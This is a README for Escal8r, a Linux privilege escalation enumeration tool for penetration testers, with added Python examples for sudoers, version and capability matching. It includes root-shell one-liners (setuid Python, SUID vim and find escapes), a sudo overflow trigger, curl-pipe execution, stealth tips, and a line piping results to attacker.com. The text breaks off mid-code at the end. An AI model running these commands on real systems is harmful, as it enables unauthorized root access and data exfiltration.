sho-luv/Escal8r
ESCAL8R

Unified Linux Privilege Escalation Enumeration Tool

A comprehensive, single-file privilege escalation enumeration script that combines the best features of LinEnum, LinPEAS, and AutoLocalPrivilegeEscalation into one weaponizable tool.


🎯 What is Escal8r?

Escal8r is a Linux privilege escalation enumeration tool designed for penetration testers and red teamers. It automatically scans a compromised Linux system to identify potential paths to gain root/administrator access.

Key Features

  • ✅ Single File Deployment - Zero external dependencies, pure Python 3
  • ✅ Curl-Pipe Ready - curl http://server.com/escal8r.py | python3
  • ✅ Embedded Databases - All exploit databases built-in (no external files needed)
  • ✅ Intelligent Matching - Automatic CVE detection for kernel, sudo, and capabilities
  • ✅ Modern Attack Vectors - Container escapes, cloud metadata exploitation
  • ✅ Color-Coded Output - Prioritized findings (CRITICAL/HIGH/MEDIUM/LOW)
  • ✅ 139+ Enumeration Checks - Comprehensive coverage across 16 categories

πŸ—οΈ Architecture

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚                        escal8r.py                           β”‚
β”‚                  (96KB, Single Executable)                  β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚                                                             β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”‚
β”‚  β”‚           EMBEDDED JSON DATABASES (52KB)             β”‚   β”‚
β”‚  β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€   β”‚
β”‚  β”‚  β€’ data_gtfobins.json     - 100+ exploitable bins    β”‚   β”‚
β”‚  β”‚  β€’ data_kernel_exploits   - 24 kernel CVEs           β”‚   β”‚
β”‚  β”‚  β€’ data_sudo_exploits     - 10+ sudo vulnerabilities β”‚   β”‚
β”‚  β”‚  β€’ data_capabilities.json - 23 Linux capabilities    β”‚   β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β”‚
β”‚                          ↓                                  β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   β”‚
β”‚  β”‚        16 ENUMERATION CLASSES (139+ checks)          β”‚   β”‚
β”‚  β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€   β”‚
β”‚  β”‚  SystemEnumerator         - Kernel, OS, security     β”‚   β”‚
β”‚  β”‚  UserEnumerator           - Users, groups, sudo      β”‚   β”‚
β”‚  β”‚  FileEnumerator           - SUID/SGID, capabilities  β”‚   β”‚
β”‚  β”‚  NetworkEnumerator        - Interfaces, ports        β”‚   β”‚
β”‚  β”‚  ProcessEnumerator        - Processes, cron, timers  β”‚   β”‚
β”‚  β”‚  ContainerEnumerator      - Docker, LXD, K8s         β”‚   β”‚
β”‚  β”‚  CloudEnumerator          - AWS, GCP, Azure          β”‚   β”‚
β”‚  β”‚  SoftwareEnumerator       - Compilers, databases     β”‚   β”‚
β”‚  β”‚  CredentialHunter         - SSH keys, API keys       β”‚   β”‚
β”‚  β”‚  EnvironmentEnumerator    - PATH, LD_PRELOAD         β”‚   β”‚
β”‚  β”‚  LegacyAuthEnumerator     - .rhosts, hosts.equiv     β”‚   β”‚
β”‚  β”‚  LogAndMailEnumerator     - Log/mail access          β”‚   β”‚
β”‚  β”‚  AdditionalSoftwareEnum   - Splunk, Jenkins, Log4j   β”‚   β”‚
β”‚  β”‚  TempAndCacheEnumerator   - /tmp, coredumps          β”‚   β”‚
β”‚  β”‚  ExploitMatcher           - CVE matching engine      β”‚   β”‚
β”‚  β”‚  Reporter                 - Summary generator        β”‚   β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜   β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

📚 Why Are There JSON Files in the Directory?

The JSON files in this repository are exploit databases that power Escal8r's intelligent analysis:

1. data_gtfobins.json (25KB)

Purpose: Maps 100+ Unix binaries to privilege escalation techniques

Why it exists: When Escal8r finds a SUID/SGID binary, it cross-references this database to determine whether it is exploitable. For example:

  • Finding /usr/bin/vim with SUID → Database provides: vim -c ':!/bin/sh' (on distributions where /bin/sh is bash, the spawned shell drops the effective UID unless it is started with -p, which is why GTFOBins' SUID entries spawn sh -p)
  • Finding /usr/bin/docker → Database suggests container escape techniques

Example Entry:

{
  "python": {
    "sudo": ["sudo python -c 'import os; os.system(\"/bin/bash\")'"],
    "suid": ["./python -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"],
    "capabilities": ["CAP_SETUID"],
    "shell": true
  }
}

2. data_kernel_exploits.json (12KB)

Purpose: Maps Linux kernel versions to known CVEs (2010-2023)

Why it exists: Escal8r extracts the running kernel version and checks whether any public exploits exist for it. Contains 24 entries including:

  • DirtyPipe (CVE-2022-0847)
  • Dirty Cow (CVE-2016-5195)
  • OverlayFS (CVE-2021-3493)
  • PwnKit (CVE-2021-4034) and Looney Tunables (CVE-2023-4911), which are userland bugs in polkit's pkexec and glibc's ld.so respectively; a kernel version range is only a proxy for these, so confirm against the installed polkit/glibc package version before relying on a match

Example Entry:

{
  "name": "DirtyPipe",
  "cve": "CVE-2022-0847",
  "kernel_min": "5.8",
  "kernel_max": "5.16.11",
  "description": "Local privilege escalation via pipe buffer overwrite",
  "severity": "critical",
  "exploit_url": "https://haxx.in/files/dirtypipez.c"
}

3. data_sudo_exploits.json (6KB)

Purpose: Maps sudo versions to CVEs and dangerous configurations

Why it exists: Checks sudo version against 10+ known vulnerabilities and scans /etc/sudoers for dangerous patterns like:

  • NOPASSWD: ALL entries
  • LD_PRELOAD environment preservation
  • (ALL, !root) bypass (CVE-2019-14287)

Example Entry:

{
  "name": "Baron Samedit",
  "cve": "CVE-2021-3156",
  "version_min": "1.8.2",
  "version_max": "1.8.31p2",
  "description": "Heap-based buffer overflow in sudo",
  "severity": "critical",
  "exploit_cmd": "sudoedit -s '\\' $(python3 -c 'print(\"A\"*1000)')"
}

Note that the advisory for CVE-2021-3156 lists sudo 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1 as affected, so a single 1.8.x range misses vulnerable 1.9 builds. The exploit_cmd above is a vulnerability check rather than a working exploit: an affected sudoedit crashes on the overlong argument, while a patched one rejects it with a usage message.
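A scanner for the three sudoers patterns listed above (NOPASSWD: ALL, LD_PRELOAD kept via env_keep, the (ALL, !root) runas list behind CVE-2019-14287), plus the pwfeedback option the tool also looks for, as an added example that is not escal8r.py's own code. The sudoers text is constructed for the demo; scan_files() shows how the same function would be pointed at /etc/sudoers and /etc/sudoers.d/* on a host, where those files are normally readable only by root.

```python
import glob
import re

# Constructed sudoers text for the demo (not from a real host).
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
Defaults        env_keep += "LD_PRELOAD"
Defaults        pwfeedback
root     ALL=(ALL:ALL) ALL
deploy   ALL=(ALL) NOPASSWD: ALL
www-data ALL=(ALL, !root) /usr/bin/vim
backup   ALL=(root) NOPASSWD: /usr/bin/rsync   # trailing comment
"""

# <who> <hosts>=(<runas_users>[:<runas_groups>]) [TAG:] <command list>
USER_SPEC = re.compile(r'^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$')


def scan_sudoers(text):
    """Return (severity, title, offending_line) tuples, in file order."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line:
            continue
        if line.startswith("Defaults"):
            if re.search(r'env_keep\s*\+?=\s*"?[^"]*\bLD_PRELOAD\b', line):
                findings.append(("HIGH", "env_keep preserves LD_PRELOAD: every "
                                 "sudo-allowed command loads an attacker-controlled .so", line))
            if re.search(r'(?<!!)\bpwfeedback\b', line):        # "!pwfeedback" is the safe form
                findings.append(("MEDIUM", "pwfeedback enabled; stack overflow on "
                                 "sudo < 1.8.26 (CVE-2019-18634)", line))
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        who, runas, cmds = m.group(1), m.group(3) or "", m.group(4)
        if re.search(r'\bNOPASSWD:\s*ALL\b', cmds):
            findings.append(("CRITICAL", f"{who}: NOPASSWD: ALL, sudo to root with no password", line))
        elif "NOPASSWD:" in cmds:
            findings.append(("HIGH", f"{who}: passwordless sudo for specific commands; "
                             "check each against GTFOBins", line))
        if re.search(r'\bALL\s*,\s*!root\b', runas):
            findings.append(("HIGH", f"{who}: (ALL, !root) runas list; sudo -u#-1 "
                             "bypasses it on sudo < 1.8.28 (CVE-2019-14287)", line))
    return findings


def scan_files(paths=("/etc/sudoers",), extra_glob="/etc/sudoers.d/*"):
    """Run scan_sudoers over the real files that happen to be readable."""
    findings = []
    for path in list(paths) + glob.glob(extra_glob):
        try:
            with open(path) as fh:
                text = fh.read()
        except OSError:
            continue                                  # unreadable unless root: normal
        findings += [(s, t, f"{path}: {l}") for s, t, l in scan_sudoers(text)]
    return findings


if __name__ == "__main__":
    for severity, title, line in scan_sudoers(SAMPLE_SUDOERS) + scan_files():
        print(f"[{severity}] {title}\n  {line}")
```

The parser only handles the plain one-line entries; aliases (User_Alias, Cmnd_Alias) and line continuations would need expanding first, which is also why `sudo -l` output, already expanded, is the better input when the files are not readable.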

4. data_capabilities.json (9KB)

Purpose: Maps Linux capabilities to exploitation techniques

Why it exists: Modern Linux can grant a binary individual file capabilities (via setcap) instead of making it SUID root, so an interesting binary may not appear in the SUID search at all. This database maps 23 capabilities (like CAP_SETUID, CAP_DAC_OVERRIDE) to specific exploit commands.

Example Entry:

{
  "CAP_SETUID": {
    "severity": "critical",
    "description": "Make arbitrary manipulations of process UIDs",
    "exploit": "setuid(0) to gain root",
    "impact": "Direct root privilege escalation",
    "example": "python -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"
  }
}

🔄 How Databases Are Used

During Build:

# JSON files exist as separate files for maintenance
data_gtfobins.json
data_kernel_exploits.json
data_sudo_exploits.json
data_capabilities.json

During Deployment:

# JSON content is EMBEDDED into escal8r.py as Python strings
GTFOBINS_DB = r"""{"bash": {...}, "vim": {...}}"""
KERNEL_EXPLOITS_DB = r"""{"exploits": [...]}"""
SUDO_EXPLOITS_DB = r"""{"exploits": [...]}"""
CAPABILITIES_DB = r"""{"capabilities": {...}}"""

At Runtime:

# Databases are parsed from embedded strings
gtfobins = json.loads(GTFOBINS_DB)
kernel_db = json.loads(KERNEL_EXPLOITS_DB)
# No external files required!

🚀 Usage

Basic Execution

# Local execution
python3 escal8r.py

# Remote execution (no file transfer needed). Plain HTTP lets anyone on the path
# replace the script before it runs; on an engagement serve it over HTTPS or
# compare a checksum before piping it into python3
curl http://yourserver.com/escal8r.py | python3

# Or with wget
wget -qO- http://yourserver.com/escal8r.py | python3

# Save output to file
python3 escal8r.py > results.txt

Requirements

  • Python: 3.6+ (Python 2 not supported)
  • Dependencies: None (stdlib only)
  • Privileges: Works as any user (more findings with root)
  • OS: Linux (tested on Ubuntu, Debian, RHEL, CentOS)

🔍 What Escal8r Checks

Phase 1-14: Data Collection (139+ Checks)

System Information (8 checks)

  • Kernel version and OS detection
  • Hostname and architecture
  • Security features (SELinux, AppArmor, ASLR)

User & Privilege Enumeration (15 checks)

  • Current user, UID, groups
  • Interesting group membership (docker, lxd, adm, disk, sudo)
  • All system users and superuser accounts
  • Passwordless sudo (sudo -n -l)
  • Sudo version detection
  • /etc/passwd, /etc/shadow accessibility
  • Password hashes in /etc/passwd

File & Permission Analysis (10 checks)

  • SUID files (find / -perm -4000) + GTFOBins matching
  • SGID files (find / -perm -2000) + GTFOBins matching
  • File capabilities (getcap -r /) + exploitation templates
  • Writable system files (/etc/passwd, /etc/shadow, /etc/sudoers)
  • World-writable SUID/SGID binaries
  • NFS exports with no_root_squash
  • /etc/fstab credential detection
  • Mount options analysis (nosuid bypass)

Network Configuration (5 checks)

  • Network interfaces (ifconfig/ip addr)
  • Listening ports (netstat/ss)
  • Routing table and ARP cache
  • DNS configuration

Process & Service Enumeration (8 checks)

  • Running processes and root processes
  • Process binaries and permissions
  • Cron jobs (/etc/cron*, /var/spool/cron)
  • Writable cron scripts
  • Systemd timers
  • Anacron jobs

Container Detection (12 checks)

  • Docker container detection (/.dockerenv, cgroups)
  • Docker installed and socket access
  • Docker group membership β†’ CRITICAL
  • Can list containers (docker ps)
  • LXC/LXD detection
  • LXD group membership β†’ CRITICAL
  • Kubernetes service account tokens
  • Kubeconfig detection
  • Container escape vector identification

Cloud Provider Detection (8 checks)

  • AWS EC2 metadata service (169.254.169.254)
  • AWS IAM role credentials β†’ CRITICAL
  • AWS Lambda detection
  • AWS ECS detection
  • Google Cloud Platform metadata
  • Microsoft Azure metadata
  • DigitalOcean metadata

Software Enumeration (15 checks)

  • Compilers (gcc, python, perl, ruby, go, java)
  • MySQL + default credential test
  • PostgreSQL, MongoDB, Redis
  • Apache version & config access
  • Nginx version
  • Git + .git directory scan
  • Git credential detection

Credential Hunting (18 checks)

  • SSH private keys (id_rsa, id_dsa, id_ecdsa, id_ed25519)
  • SSH authorized_keys
  • Command history files (.bash_history, .zsh_history)
  • Password patterns in history
  • Database configuration files
  • .env files β†’ HIGH PRIORITY
  • AWS credentials (~/.aws/credentials) β†’ CRITICAL
  • API key pattern matching
  • Backup files (*.bak, *.backup, *.old, *~)
  • Sensitive backup detection

Environment Analysis (7 checks)

  • Environment variables enumeration
  • Sensitive data in env vars (password, secret, key, token)
  • PATH writable directories β†’ HIGH
  • LD_PRELOAD detection
  • LD_LIBRARY_PATH detection

Legacy Authentication (3 checks)

  • hosts.equiv detection
  • .rhosts file enumeration
  • .plan file discovery

Log & Mail Analysis (5 checks)

  • /var/log/ accessibility
  • Readable log files (auth.log, secure, messages)
  • Root mail access attempts

Additional Software Detection (8 checks)

  • Splunk, Jenkins, Ansible
  • Puppet, Chef, Vault (HashiCorp)
  • Logstash configuration
  • Log4j JAR detection (CVE-2021-44228)

Temporary Files & Cache (5 checks)

  • /tmp and /dev/shm analysis
  • Coredump discovery
  • PHP session file enumeration

Phase 15: Intelligent Exploit Matching

Kernel Exploit Matching

# Extracts kernel version: 5.15.0
# Compares against 24 CVE ranges
# Output:
[CRITICAL] DirtyPipe (CVE-2022-0847)
  Local privilege escalation via pipe buffer overwrite
  Kernel range: 5.8 - 5.16.11
  [EXPLOIT]: https://haxx.in/files/dirtypipez.c

The match is by upstream version number only. Distribution kernels backport fixes without changing that number (a 2023 Ubuntu 5.15.0-NN-generic kernel already carries the DirtyPipe fix), so a hit is a lead to confirm against the vendor changelog or a proof-of-concept, not proof of exploitability.

Sudo Exploit Matching

# Parses: Sudo version 1.8.31p2
# Matches against 10+ sudo CVEs
# Scans /etc/sudoers for patterns
# Output:
[CRITICAL] Baron Samedit (CVE-2021-3156)
  Heap-based buffer overflow in sudo
  Version range: 1.8.2 - 1.8.31p2
  [EXPLOIT]: https://github.com/blasty/CVE-2021-3156
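The version-range comparison behind the kernel and sudo matchers above, as an added example (not escal8r.py's code). The database entries are constructed in the shape of the README's JSON; the sudo entry for CVE-2021-3156 carries both affected version lines, and every kernel hit on a distribution kernel is flagged needs_confirmation because the upstream number alone cannot say whether the fix was backported.

```python
import re

# Constructed entries (illustrative subset, not the project's real database).
KERNEL_DB = [
    {"name": "DirtyPipe", "cve": "CVE-2022-0847", "kernel_min": "5.8", "kernel_max": "5.16.11"},
    {"name": "Dirty Cow", "cve": "CVE-2016-5195", "kernel_min": "2.6.22", "kernel_max": "4.8.3"},
]
SUDO_DB = [
    {"name": "Baron Samedit", "cve": "CVE-2021-3156",
     "ranges": [("1.8.2", "1.8.31p2"), ("1.9.0", "1.9.5p1")]},
    {"name": "Runas bypass", "cve": "CVE-2019-14287", "ranges": [("1.8.0", "1.8.27")]},
]

VERSION_RE = re.compile(r'^v?(\d+(?:\.\d+){0,2})(?:p(\d+))?')
# "5.15.0-83-generic", "4.18.0-477.el8", "5.10.0-23-amd64": a vendor suffix follows the number
DISTRO_SUFFIX_RE = re.compile(r'^\d+(?:\.\d+)*(?:[-+~]\S+|\.[A-Za-z]\S*)')


def parse_version(s):
    """'5.15.0-83-generic' -> (5, 15, 0, 0); '1.8.31p2' -> (1, 8, 31, 2); '5.8' -> (5, 8, 0, 0).
    The fourth element is sudo's pN patch level; distro suffixes are ignored."""
    m = VERSION_RE.match(s.strip())
    if not m:
        raise ValueError(f"unparseable version: {s!r}")
    parts = [int(x) for x in m.group(1).split(".")]
    parts += [0] * (3 - len(parts))
    parts.append(int(m.group(2) or 0))
    return tuple(parts)


def in_range(version, low, high):
    # Inclusive on both ends, matching the README's kernel_min/kernel_max fields.
    # kernel_max is typically the first *fixed* release, so a kernel reporting
    # exactly that version is a false positive; confirm before acting.
    return parse_version(low) <= parse_version(version) <= parse_version(high)


def is_distro_kernel(uname_r):
    """True when uname -r carries a vendor suffix, i.e. fixes may be backported."""
    return bool(DISTRO_SUFFIX_RE.match(uname_r.strip()))


def match_kernel(uname_r, db=KERNEL_DB):
    hits = []
    for entry in db:
        if in_range(uname_r, entry["kernel_min"], entry["kernel_max"]):
            hits.append({**entry, "needs_confirmation": is_distro_kernel(uname_r)})
    return hits


def match_sudo(sudo_v_output, db=SUDO_DB):
    """Takes `sudo -V` output; only the 'Sudo version X' line is used."""
    m = re.search(r'Sudo version\s+(\S+)', sudo_v_output)
    if not m:
        return []
    return [e for e in db if any(in_range(m.group(1), lo, hi) for lo, hi in e["ranges"])]


if __name__ == "__main__":
    import platform
    import subprocess
    for h in match_kernel(platform.release()):
        tag = "  [confirm: distro kernel, fix may be backported]" if h["needs_confirmation"] else ""
        print(f"[CRITICAL] {h['name']} ({h['cve']}){tag}")
    try:
        out = subprocess.run(["sudo", "-V"], capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.SubprocessError):
        out = ""
    for e in match_sudo(out):
        print(f"[CRITICAL] {e['name']} ({e['cve']})")
```

Comparing tuples rather than strings is the point: string comparison puts "1.8.31p2" before "1.8.4" and "5.10" before "5.8", both of which produce silent misses in a range check.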

Capability Exploit Matching

# Parses: /usr/bin/python3.8 = cap_setuid+ep
#   (newer libcap, 2.41 and later, prints the same entry as "/usr/bin/python3.8 cap_setuid=ep";
#    the parser has to accept both layouts)
# Matches against 23 capabilities
# Provides ready-to-use exploit
# Output:
[CRITICAL] CAP_SETUID on /usr/bin/python3.8
  Make arbitrary manipulations of process UIDs
  Impact: Direct root privilege escalation
  [EXPLOIT]: python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

SUID/SGID + GTFOBins Matching

# Finds: -rwsr-xr-x /usr/bin/vim
# Cross-references GTFOBins database
# Output:
[CRITICAL] SUID binary with GTFOBins entry: /usr/bin/vim
  Can be exploited for privilege escalation
  [EXPLOIT]: vim -c ':!/bin/sh'
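The two lookups above (capabilities and SUID binaries against their databases), as an added example that is not the project's code. The databases are constructed subsets in the README's shape, the getcap output is constructed and deliberately mixes the old "path = caps+flags" layout with the current "path caps=flags" one, and the SUID matcher normalises names such as python3.8 and vim.basic to the GTFOBins key. A capability that is permitted but not effective is downgraded, because a program that does not raise capabilities itself never gets to use it.

```python
import os
import re

# Constructed subsets, not the project's data files.
CAPABILITIES_DB = {
    "cap_setuid": {"severity": "critical",
                   "example": "{bin} -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"},
    "cap_dac_read_search": {"severity": "high",
                            "example": "read any file regardless of mode bits, e.g. /etc/shadow, from {bin}"},
    "cap_net_raw": {"severity": "low", "example": "raw sockets only (sniffing), not privilege escalation"},
}
GTFOBINS_DB = {
    "find": {"suid": ["./find . -exec /bin/sh -p \\; -quit"]},
    "vim":  {"suid": ["./vim -c ':py3 import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"]},
}

# Constructed `getcap -r /` output in both libcap layouts.
GETCAP_OUTPUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/opt/tool/helper cap_setuid=p
"""
# Constructed `find / -perm -4000 -type f` output.
SUID_FILES = ["/usr/bin/passwd", "/usr/bin/find", "/usr/local/bin/vim.basic"]

GETCAP_LINE = re.compile(r'^(\S+)\s*=?\s*([\w,]+)[+=]([a-z]+)$')


def parse_getcap(output):
    """-> [(path, [cap, ...], {flag, ...})]; accepts old and new getcap formats."""
    entries = []
    for line in output.splitlines():
        m = GETCAP_LINE.match(line.strip())
        if m:
            entries.append((m.group(1), m.group(2).lower().split(","), set(m.group(3))))
    return entries


def match_capabilities(entries, db=CAPABILITIES_DB):
    findings = []
    for path, caps, flags in entries:
        for cap in caps:
            info = db.get(cap)
            if not info:
                continue
            effective = "e" in flags          # without 'e' a stock interpreter cannot use it
            findings.append({"path": path, "cap": cap, "effective": effective,
                             "severity": info["severity"] if effective else "medium",
                             "exploit": info["example"].format(bin=path)})
    return findings


def gtfobins_keys(path):
    """python3.8 -> [python3.8, python3, python]; vim.basic -> [vim.basic, vim]."""
    name = os.path.basename(path)
    cands = [name, name.split(".")[0], re.sub(r'[\d.]+$', '', name)]
    return [c for i, c in enumerate(cands) if c and c not in cands[:i]]


def match_suid(paths, db=GTFOBINS_DB):
    findings = []
    for path in paths:
        for key in gtfobins_keys(path):
            techniques = db.get(key, {}).get("suid")
            if techniques:
                findings.append({"path": path, "key": key, "exploit": techniques[0]})
                break
    return findings


if __name__ == "__main__":
    import subprocess

    def run(cmd):
        try:
            return subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=600).stdout
        except (OSError, subprocess.SubprocessError):
            return ""

    for f in match_capabilities(parse_getcap(run("getcap -r / 2>/dev/null"))):
        print(f"[{f['severity'].upper()}] {f['cap']} on {f['path']}: {f['exploit']}")
    for f in match_suid(run("find / -perm -4000 -type f 2>/dev/null").split()):
        print(f"[CRITICAL] SUID {f['path']} (GTFOBins '{f['key']}'): {f['exploit']}")
```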

Phase 16: Executive Summary

╔═══════════════════════════════════════════════════════════╗
║                    EXECUTIVE SUMMARY                      ║
╚═══════════════════════════════════════════════════════════╝

Hostname: victim-server
Current User: www-data
Kernel: Linux 5.15.0-83-generic

CRITICAL Findings: 5
HIGH Findings: 12
MEDIUM Findings: 8
LOW Findings: 3

[✓] Enumeration complete!

🔄 How It Works: Execution Flow

┌────────────────────────────────────────────────────────────┐
│  PHASE 1-14: ENUMERATION (Data Collection)                 │
├────────────────────────────────────────────────────────────┤
│  • Runs 139+ checks across 14 enumeration classes          │
│  • Collects: files, processes, configs, credentials        │
│  • Stores findings in all_results dictionary               │
└────────────────────────────────────────────────────────────┘
                            ↓
┌────────────────────────────────────────────────────────────┐
│  PHASE 15: EXPLOIT MATCHING (Intelligent Analysis)         │
├────────────────────────────────────────────────────────────┤
│  ┌─────────────────────────────────────────────────────┐   │
│  │ KERNEL EXPLOIT MATCHING                             │   │
│  │ • Extract kernel version (e.g., 5.15.0)             │   │
│  │ • Compare against 24 kernel CVE ranges              │   │
│  │ • Match: DirtyPipe, Dirty Cow, PwnKit, etc.         │   │
│  └─────────────────────────────────────────────────────┘   │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ SUDO EXPLOIT MATCHING                               │   │
│  │ • Parse sudo version (e.g., 1.9.13p2)               │   │
│  │ • Check against 10+ sudo CVEs                       │   │
│  │ • Scan sudoers for dangerous configs                │   │
│  │ • Detect: LD_PRELOAD, NOPASSWD, pwfeedback          │   │
│  └─────────────────────────────────────────────────────┘   │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ CAPABILITY EXPLOIT MATCHING                         │   │
│  │ • Parse getcap output for each binary               │   │
│  │ • Match against 23 dangerous capabilities           │   │
│  │ • Provide exploitation templates                    │   │
│  │ • Detect: CAP_SETUID, CAP_DAC_OVERRIDE, etc.        │   │
│  └─────────────────────────────────────────────────────┘   │
│  ┌─────────────────────────────────────────────────────┐   │
│  │ SUID/SGID + GTFOBins MATCHING                       │   │
│  │ • Find all SUID/SGID binaries                       │   │
│  │ • Cross-reference with GTFOBins database            │   │
│  │ • Highlight: bash, vim, python, docker, etc.        │   │
│  │ • Provide ready-to-use exploitation commands        │   │
│  └─────────────────────────────────────────────────────┘   │
└────────────────────────────────────────────────────────────┘
                            ↓
┌────────────────────────────────────────────────────────────┐
│  PHASE 16: REPORT GENERATION                               │
├────────────────────────────────────────────────────────────┤
│  • Color-coded findings: CRITICAL/HIGH/MEDIUM/LOW          │
│  • Exploitation suggestions embedded with each finding     │
│  • Executive summary with finding counts                   │
└────────────────────────────────────────────────────────────┘

📊 Coverage Statistics

Source Tool     Checks   Coverage
LinEnum         60+      ~98%
LinPEAS         147+     ~85%
AutoLocalPE     24       100%
Total Unique    180+     ~92-95%

🎨 Output Format

Findings are color-coded by severity:

  • πŸ”΄ CRITICAL (Red) - Direct privilege escalation paths
  • 🟑 HIGH (Yellow) - Likely exploitation vectors
  • πŸ”΅ MEDIUM (Blue) - Potential security issues
  • πŸ”΅ LOW (Cyan) - Informational findings

Each finding includes:

  • Title - What was found
  • Description - Why it's dangerous
  • Exploit - Ready-to-use command or URL

🛡️ Operational Security

Stealth Considerations

Low Footprint:

  • No compilation required
  • No files written (unless output is redirected)
  • Runs entirely in memory
  • Execution time: ~2-3 minutes

Detection Risks:

  • The SUID/SGID and capability searches walk the whole filesystem (find / ..., getcap -r /), which is noisy in auditd and EDR telemetry
  • Capability checks depend on getcap, which may not be installed
  • Cloud checks send HTTP requests to the metadata endpoint (169.254.169.254) that host-based monitoring can see
  • Process listing, sudo -l and credential hunting look like known enumeration tooling and may be flagged by EDR/AV

Best Practices:

# Run with output redirection to avoid terminal artifacts
python3 escal8r.py > /tmp/.hidden_results.txt

# Clean up after execution
rm /tmp/.hidden_results.txt

# Or pipe directly to a remote collector (--data-binary keeps the newlines that -d would strip)
python3 escal8r.py | curl -X POST --data-binary @- https://attacker.com/upload

🔧 Development & Customization

Project Structure

Escal8r/
├── escal8r.py                        # Main executable (96KB, 2,740 lines)
├── data_gtfobins.json                # GTFOBins database (25KB)
├── data_kernel_exploits.json         # Kernel CVE database (12KB)
├── data_sudo_exploits.json           # Sudo vulnerability database (6KB)
├── data_capabilities.json            # Capabilities database (9KB)
├── MASTER_ENUMERATION_MATRIX.md      # Complete check mapping (33KB)
├── LINPEAS_ENUMERATION_CATALOG.md    # LinPEAS analysis (54KB)
├── STATUS_REPORT.md                  # Project status
└── README.md                         # This file

Adding Custom Checks

To add new enumeration checks:

  1. Create/Edit an Enumerator Class:
class CustomEnumerator:
    def __init__(self):
        self.results = {}

    def check_custom_vulnerability(self):
        """Check for custom vulnerability"""
        # run_cmd() and print_finding() are escal8r.py's existing helpers
        result = run_cmd("your_command_here")

        if suspicious_condition(result):   # your own predicate over the command output
            print_finding("CRITICAL",
                          "Custom Finding Title",
                          "Description of the issue",
                          "Exploitation command or URL")
            self.results['custom_vuln'] = result

        return self.results
  2. Integrate into main():
def main():
    # ... existing phases ...

    # Phase N: Custom checks
    custom_enum = CustomEnumerator()
    all_results.update(custom_enum.check_custom_vulnerability())
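A complete check in the shape of the template above, as an added example rather than code from escal8r.py: it implements the "writable cron scripts" item from the Process & Service list. print_finding() is a stand-in with an assumed signature, since the README does not show the real helper. The parsing function takes its file-existence and writability tests as parameters so it can be exercised on a constructed crontab without touching the filesystem; the class wires it to the real cron locations.

```python
import glob
import os
import re


def print_finding(severity, title, description, exploit=""):
    """Stand-in for escal8r.py's helper (assumed signature)."""
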